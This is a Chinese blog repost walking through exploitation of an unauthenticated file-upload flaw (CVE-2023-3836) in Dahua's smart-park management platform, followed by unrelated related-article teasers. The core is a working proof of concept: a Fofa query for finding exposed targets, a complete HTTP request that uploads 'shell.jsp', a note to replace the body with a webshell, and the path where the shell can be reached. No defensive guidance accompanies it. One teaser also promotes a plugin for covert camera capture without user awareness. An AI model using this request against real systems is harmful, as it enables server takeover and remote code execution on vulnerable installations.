大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)

news2024/11/27 20:31:50

大华智慧园区综合管理平台文件上传漏洞

  • 漏洞描述
  • 漏洞危害
  • Fofa检索
  • 漏洞复现
    • 1. 构造poc
    • 2. 复现
    • 3. 访问shell地址

漏洞描述

大华智慧园区综合管理平台是一个基于智能物联技术的园区安防、办公、运营的数字化解决方案。 大华智慧园区综合管理平台(截至 20230713)版本中存在文件上传漏洞。未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。

漏洞危害

未经授权的攻击者可通过上传jsp的webshell造成rce,获取服务器权限

Fofa检索

app=“dahua-智慧园区综合管理平台”
在这里插入图片描述在这里插入图片描述

漏洞复现

1. 构造poc

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=---------------------------23866052015499226143339905740
Content-Length: 1176

-----------------------------23866052015499226143339905740
Content-Disposition: form-data; name="upload"; filename="shell.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

123
-----------------------------23866052015499226143339905740--

2. 复现

在这里插入图片描述123可修改为webshell

3. 访问shell地址

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1160451.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vim三种模式,文本操作(操作字符/光标,列出行号可视化块模式/多文件查看)

vim三种模式,文本操作(操作字符/光标,列出行号可视化块模式/多文件查看)

目录 vim--文本编辑器 功能 基本概念 命令/默认模式 插入模式 底行模式 文本操作 引入 移动光标位置 删除字符 -- x/dd 复制/粘贴字符 -- yw/yyp 替换文本 -- r / %s 底行模式 全局替换 -- /g 撤销操作 -- u / ctrlr 修改字符 -- cw 示例 跳行 -- ctrlg 底行…
阅读更多...
uniapp原生插件之无预览静默拍照

uniapp原生插件之无预览静默拍照

插件介绍 无预览静默拍照,在用户无感觉情况下调用摄像头拍照 插件地址 无预览静默拍照 - DCloud 插件市场 超级福利 uniapp 插件购买超级福利 插件申请权限 存储卡读写权限摄像头权限 manifest.json权限列表 /* android打包配置 */"android" : {…
阅读更多...
ps提示vcruntime140.dll无法继续执行此代码的多种解决方法分享

ps提示vcruntime140.dll无法继续执行此代码的多种解决方法分享

我在安装Photoshop软件时遇到了一个问题,即在运行过程中弹出了一个错误提示框,显示“由于找不到vcruntime140.dll,无法继续执行此代码”,我通过查找资料了解到vcruntime140.dll是一个动态链接库文件,它是Visual C Redi…
阅读更多...
MySQL主从复制---一主一从配置过程

MySQL主从复制---一主一从配置过程

1、mysql版本一致且后台以服务运行 2、主从都配置在[mysqld]结点下,都是小写 3、主机修改my.ini配置文件 配置信息说明: 1、主服务器唯一ID server-id1 2、启用二进制日志 log-bin自己本地的路径/data/mysqlbin log-binD:/devSoft/MySQLServer5.5…
阅读更多...
自动化混沌工程 ChaosMeta V0.6 版本发布

自动化混沌工程 ChaosMeta V0.6 版本发布

混沌工程 ChaosMeta 的全新版本 V0.6.0 现已正式发布!该版本包含了许多新特性和增强功能,在编排界面提供了包括流量注入、度量等各类节点的支持,可视化支撑演练全流程。解决混沌工程原则中“持续自动化运行实验”的最后一公里问题。 简介 Ch…
阅读更多...
Spring Security认证:获得认证、持久化认证模块详解

Spring Security认证:获得认证、持久化认证模块详解

参考:认证 :: Spring Security Reference (springdoc.cn) 本文将讲述Spring Security中与认证相关的各个基本模块,力求对整个认证框架提供完善的认知。 众所周知,认证Authentication实际上就是一个代表身份的类,实例就是具体的身…
阅读更多...
第一章 01Java入门-常见的CMD命令

第一章 01Java入门-常见的CMD命令

前言 学习常见的CMD命令 一、常见的CMD命令 常见的CMD命令主要包括切换盘符、查看当前路径下的内容、进入单级目录、回到上一级目录、进入多级目录、回退到盘符目录、清屏以及退出命令提示符窗口等。 二、代码演示 先从默认的C盘符切换到E盘符(E:),然后再查看E盘符下面的…
阅读更多...
Redis的四种部署方案

Redis的四种部署方案

这篇文章介绍Reids最为常见的四种部署模式,其实Reids和数据库的集群模式差不多,可以分为 Redis单机模式部署、Redis主从模式部署、Redis哨兵模式部署、Cluster集群模式部署,其他的部署方式基本都是围绕以下几种方式在进行调整到适应的生产环境…
阅读更多...
【C++】多态 ⑩ ( 不建议将所有函数都声明为 virtual 虚函数 | 多态的理解层次 | 父类指针和子类指针步长 )

【C++】多态 ⑩ ( 不建议将所有函数都声明为 virtual 虚函数 | 多态的理解层次 | 父类指针和子类指针步长 )

文章目录 一、不建议将所有函数都声明为 virtual 虚函数二、多态的理解层次三、父类指针和子类指针步长 对象可以直接获取到自身封装的 普通函数 , 如果要访问虚函数 , 需要增加一次寻址操作 , 因此 这里建议不需要将有 多态 需求的函数声明为 虚函数 ; C 中 指向某类型对象的…
阅读更多...
有什么好用的仓库配件管理软件?如何实现企业配件管理智能化?

有什么好用的仓库配件管理软件?如何实现企业配件管理智能化?

在当今高度信息化的商业环境中,企业运营的效率和管理的重要性日益凸显。对于许多企业来说,仓库配件管理是一个关键的环节,它不仅涉及到物品的存储和分发,还与企业的成本控制和运营流程紧密相关。然而,管理仓库配件是一…
阅读更多...
C++快餐——C++11(3)

C++快餐——C++11(3)

应该在脖子上长一个自己的脑袋 文章目录 function包装器bind绑定普通函数绑定成员函数std::bind优点 线程库thread类创建线程线程管理线程标识 原子性操作库(atomic)lock_guard与unique_lockstd::lock_guardstd::unique_lock mutex的种类总结 function包装器 C11引入了一个名为…
阅读更多...
ubuntu启动报错error: proc_thermal_add, will cont

ubuntu启动报错error: proc_thermal_add, will cont

如题,ubuntu启动报错error: proc_thermal_add, will cont 截图如下: 困扰了我很久,差点就打算重装系统,准备放弃了,但是感谢国外的老哥,写了一篇非常详细的解决方案,我搬过来。 解决方案&#…
阅读更多...
基础课14——文本标注

基础课14——文本标注

人工智能界流传一句俏皮话:“有多少人工,就有多少智能。” 1.人工智能数据标注介绍 2018年9月,百度智能云与山西综改示范区达成合作,在太原共同建立了百度(山西)人工智能基础数据产业基地(简称…
阅读更多...
AI时代,ChatGPT与文心一言选哪一个?

AI时代,ChatGPT与文心一言选哪一个?

🎈个人公众号:🎈 :✨✨✨ 可为编程✨ 🍟🍟 🔑个人信条:🔑 为与不为皆为可为🌵 你们平时都是在什么情况下使用GPT的呢?为何使用?都使用什么平台的? 针对以上问…
阅读更多...
高防CDN的特点与作用

高防CDN的特点与作用

高级防护CDN是一种专门设计用于提供出色的网络安全功能的内容分发网络。它通过采用分布式节点、智能路由和强大的安全机制,旨在确保网站在面临各种网络攻击时保持安全,同时提供内容的快速传递和优化功能。那么,高级防护CDN有哪些独特的特点和…
阅读更多...
win10pycharm和anaconda安装和环境配置教程

win10pycharm和anaconda安装和环境配置教程

windows10 64位操作系统下系统运行环境安装配置说明 下载和安装Anaconda,链接https://www.anaconda.com/download 下载完后,双击exe文件 将anaconda自动弹出的窗口全部关掉即可,然后配置高级系统变量 根据自己的路径,配置…
阅读更多...
前端移动高级web详细解析五

前端移动高级web详细解析五

响应式布局方案 媒体查询 Bootstrap框架 01-媒体查询 基本写法 max-width:最大宽度(小于等于) min-width:最小宽度(大于等于) 书写顺序 min-width(从小到大) max-width&…
阅读更多...
IDEA上也能用Postman了?

IDEA上也能用Postman了?

Postman是大家最常用的API调试工具,国产API调试工具 Apipost 推出IDEA插件,写完代码就可以调试接口并一键生成接口文档!而且还可以根据已有的方法帮助您快速生成 url 和 params。Apipost Helper API 调试工具 API 管理工具 API 搜索工具。…
阅读更多...
领先实践|IDEO 最佳设计思维和策略框架

领先实践|IDEO 最佳设计思维和策略框架

设计思维是一种以人为本的创新方法,它从人类的角度出发,考虑技术上可行和经济上可行的内容。框架可以成为实现设计思维、策略和系统设计的有用工具。本文由此展开阐述 IDEO 的最佳设计思维和策略框架。 01. 设计思维框架 1.1 设计思维过程 设计思维?是…
阅读更多...
【python】爬取豆瓣电影排行榜TOP250存储到CSV文件中

【python】爬取豆瓣电影排行榜TOP250存储到CSV文件中

一、导入必要的模块: 代码首先导入了需要使用的模块:requests、lxml和csv。 import requests from lxml import etree import csv 如果出现模块报错 进入控制台输入:建议使用国内镜像源 pip install 模块名称 -i https://mirrors.aliyun.co…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023